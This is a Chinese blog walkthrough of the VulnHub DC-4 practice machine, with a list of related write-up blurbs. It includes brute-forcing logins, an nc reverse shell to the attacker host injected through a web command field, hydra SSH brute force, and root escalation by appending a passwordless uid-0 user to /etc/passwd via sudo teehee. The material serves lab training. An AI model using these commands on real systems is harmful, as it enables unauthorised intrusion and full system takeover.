渗透测试靶机练习 DC-4

最新推荐文章于 2024-09-18 22:16:11 发布
最新推荐文章于 2024-09-18 22:16:11 发布
阅读量580 收藏 1
点赞数 1
分类专栏: vulnhub靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43705814/article/details/112608332
版权

渗透测试靶机练习 DC-4

一、靶机介绍

与之前的靶机是一个系列可在该网站下载搭建
链接:https://www.vulnhub.com/

二、所需工具与思路

Namp:获取IP,端口以及详细信息
burp:爆破破解账号密码
nc反弹shell
hydra爆破密码.
提权

三、渗透测试获取Flag

1.进行主机发现确认主机地址
nmap 192.168.1.0/24
2.对主机进行端口扫描获取详细信息
nmap -p- -A -sV -sS -O 192.168.1.104

在这里插入图片描述开放了80和22端口

3.首先访问80端口

在这里插入图片描述需要账号和密码登录,可以使用burpsuit进行密码爆破
Username:admin
Password:happy
在这里插入图片描述

4.建立连接

通过burpsuit抓包,使用nc进行反弹
首先开启nc的监听端口
在这里插入图片描述然后通过burp抓包进行修改,建立连接

nc 192.168.1.106 1234 -e /bin/bash

在这里插入图片描述在这里插入图片描述建立交互式shell便于操作这里我们使用python建立

python -c 'import pty;pty.spawn("/bin/sh")'
5.查看home目录

在这里插入图片描述
发现有三个用户,注意查看搜集有用信息,最终在jim用户下发现密码备份

在这里插入图片描述
因为开放了ssh连接端口,可以尝试进行远程连接
将密码复制到本地即可使用hydra进行爆破

hydra -l jim -P passwd ssh://192.168.1.104

在这里插入图片描述使用ssh进行远程连接
在这里插入图片描述查看mbox是root用户发来的邮件
在这里插入图片描述
进入/var/mail/查看邮件内容
在这里插入图片描述获得带有密码的邮件
切换用户charles
在这里插入图片描述
查看拥有哪些权限

sudo -l

在这里插入图片描述发现拥有一个root权限可以免密码执行
查看使用方法

teehee --help

在这里插入图片描述可以使用-a: 附加到给定文件,不覆盖

6.提权

尝试在/etc/passwd文件下追加内容

内容结构
用户名:是否有密码保护(x即有保护):uid:gid:全称:home目录:/bin/bash
当uid=0;gid=0时是root权限
echo "hacker::0:0:::/bin/bash" | sudo teehee -a /etc/passwd

在这里插入图片描述
进入root文件获取flag
在这里插入图片描述

DC4靶机渗透测试
Huangshanyoumu的博客
04-16 778
文章目录环境版本:一、信息收集1.主机发现2.端口扫描二、漏洞挖掘1.访问目标 ip,查看内容2.使用 BP 进行爆破密码3.使用密码登陆4.使用 BP 查看执行命令流量包5.替换命令来使用 nc 建立连接7.使用 nc 将靶机文件传输到攻击机8.使用 hydra 爆破 ssh 密码9.ssh 登陆,进行信息收集10.提权 描述:从靶机DC-3开始,只有一个入口和一个最终的flag, 只有拿到root权限才可以发现最终的flag,DC-4也是一样 环境版本: VMware pro 16 Kali 202
DC系列之DC-6渗透测试
最新发布
qq_45392044的博客
01-02 1231
echo "os.execute('/bin/bash')" >> root.nse #将os.execute('/bin/bash')写入到root.nse文件中。除了本地需要修改hosts文件,那我们用kali虚拟机去访问目标80端口的时候,我们也需要去修改一下本机的host文件。在使用wpscan之前我们要做一个工具的更新: wpscan --update 更新工具。进入到mark 的家目录下,在stuff 目录下发现things-to-do.txt 文件。
DC-4靶机实战 渗透测试
她叫常玉莹
07-23 476
使用arp-scan查看主机 arp-scan -l 靶机ip地址为192.168.0.151,使用nmap进行扫描 目标机开放了80端口与22端口,使用浏览器访问下80端口 页面是一个表单,抓下包看一下 使用jhon的字典进行爆破 密码为happy登陆一下。 点击command可以运行命令,bp抓下数据包分析下 命令是由radio参数传入的,并且使用“+”代替“ ”(空格)。发送到repeater模块修改radio参数测试一下。 可以看到命令成功执行了,说明这里存在命令注入漏洞。在/home
DC-4靶机渗透测试
来日可期的博客
08-11 1369
当运行sudo su命令时,系统会要求输入当前用户的密码,以确认你有权限切换到root用户。一旦密码验证通过,一个新的shell会打开,并以root用户的身份进行操作。在本例中使用提权命令后用户在切换到root用户的时候无需输入密码即可登录。
DC-4 渗透测试
Darklord.W
04-14 1322
DC-4渗透测试 0x00实验环境 靶机DC-4,IP地址:192.168.8.135 测试机:Kali,IP地址:192.168.8.128; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 Masscan以及nmap扫描 访问web端 扫描web目录 但是没有什么有价值的内容 尝试暴力破解 得到admin...
DC-4靶机渗透
qq_56805195的博客
07-07 1105
第一次写文章,请各位大佬指教
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 2087
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习靶机是vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
渗透测试综合靶场 DC-1 通关详解
goldfish8848的博客
09-18 1809
我们收集信息的第一步首先用到了nmap来探测IP和开放端口。nmap(网络映射器)是一款开源的网络扫描和安全审计工具,它可以用来发现网络上的设备,检测开放的端口,确定运行在网络设备上的服务及其版本信息,以及检测潜在的安全漏洞。常用nmap命令:nmap -sn 目标IP地址:快速扫描目标网络,仅用于主机发现,不扫描端口。nmap -sn 目标IP地址/24:扫描整个C类子网。nmap 目标IP地址:扫描目标IP地址上的常见端口。nmap -p 端口号 目标IP地址:扫描特定端口。
dc-4靶机练习.docx
01-02
第一步;靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新... 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有root权限
渗透测试靶机试炼(一)
热门推荐
simple___sunny的博客
01-10 1万+
1
【vulnhub】DC系列之DC-4渗透测试
Hi~ 土拨鼠
12-28 512
文章目录一、实验环境二、实验要求三、渗透过程 一、实验环境 目标靶机DC-4,NAT模式 攻击机:kali,NAT模式,IP:192.168.35.131 二、实验要求 拿到唯一一个flag就ok! 三、渗透过程 信息收集: 使用nmap扫描存活主机: nmap -sP 192.168.35.0/24 -oN nmap.sP 得到靶机IP:192.168.35.151 端口扫描及版本探测: nmap -sV 192.168.35.151 -O -p 1-65535 -oN nmap.sV 发现开放了
渗透测试靶机练习-DC-1 实战
飞鱼的企鹅的博客
06-15 4387
第一次深入的了解靶机,下面把我做题的整个流程写在下面,仅供参考 靶机介绍 我所用的靶机是在vulnhub上下载的,网址如下 https://www.vulnhub.com/?page=1 里面有许多靶机可以供我们练习,我之后也将会花很多时间去练习,来提高自己的技术。对DC-1的介绍如下 大概意思啊是这个靶机需要你获得root权限,并找到所有的5个flag 入侵靶机 DC-1下载好之后,可以在VM...
DC-4靶机渗透指南(渗透测试详细操作)
jrdh的博客
12-06 5188
DC-4 靶机渗透测试,帮助读者了解DC系列的具体考察内容
渗透测试靶机DC-4
prettyX的博客
12-06 549
开始 : ) 环境准备 靶机下载:http://www.five86.com 虚拟机:Virtual Box Kali 开始 看一下DC-4的介绍。 为初、中级选手准备,只有一个Flag,从技术上讲,有多个入口,没有线索。Go 靶机IP发现 nmap 尝试80访问 这里对登录页面做爆破,可以使用BurpSuite,这里使用hydra。 字典RockYo...
靶机渗透练习50-KB-VULN2
hirak0的博客
04-19 496
靶机描述 靶机地址:https://www.vulnhub.com/entry/kb-vuln-2,562/ Description Machine Level : Easy A machine that measures your attention and require your research. This VM is running on VirtualBox. It includes 2 flags:user.txt and flag.txt This works better with Vi
靶机渗透练习01-driftingblues1
Force~
03-24 1916
靶机地址: https://www.vulnhub.com/entry/driftingblues-1,625/ ###1、主机探活 arp-scan -I eth0 -l (指定网卡扫) masscan 192.168.184.0/24 -p 80,22 netdiscover -i eth0 -r 192.168.184.0/24 ###2、端口扫描 nmap -A -sV -T4 -p- 192.168.111.8 ###3、访问80端口,遇事不决,目录扫描来一波 gobuster .
靶机渗透】Escalate_Linux靶机渗透练习+12种提权方式
serendipity1130的博客
08-31 5238
注:这个靶机主要用来练习Linux提权,有超过12种的提权方法 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.149,并进行访问 2.扫描端口,开启了80,22端口 nmap -n -p- -A 192.168.225.149 -o escalate.nmap 3.发现是默认的apache页面,那么爆破php后缀的路径,发现shell.php的页面,进行访问: dirb http://192.168.225.149 -X .php 4.提示:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值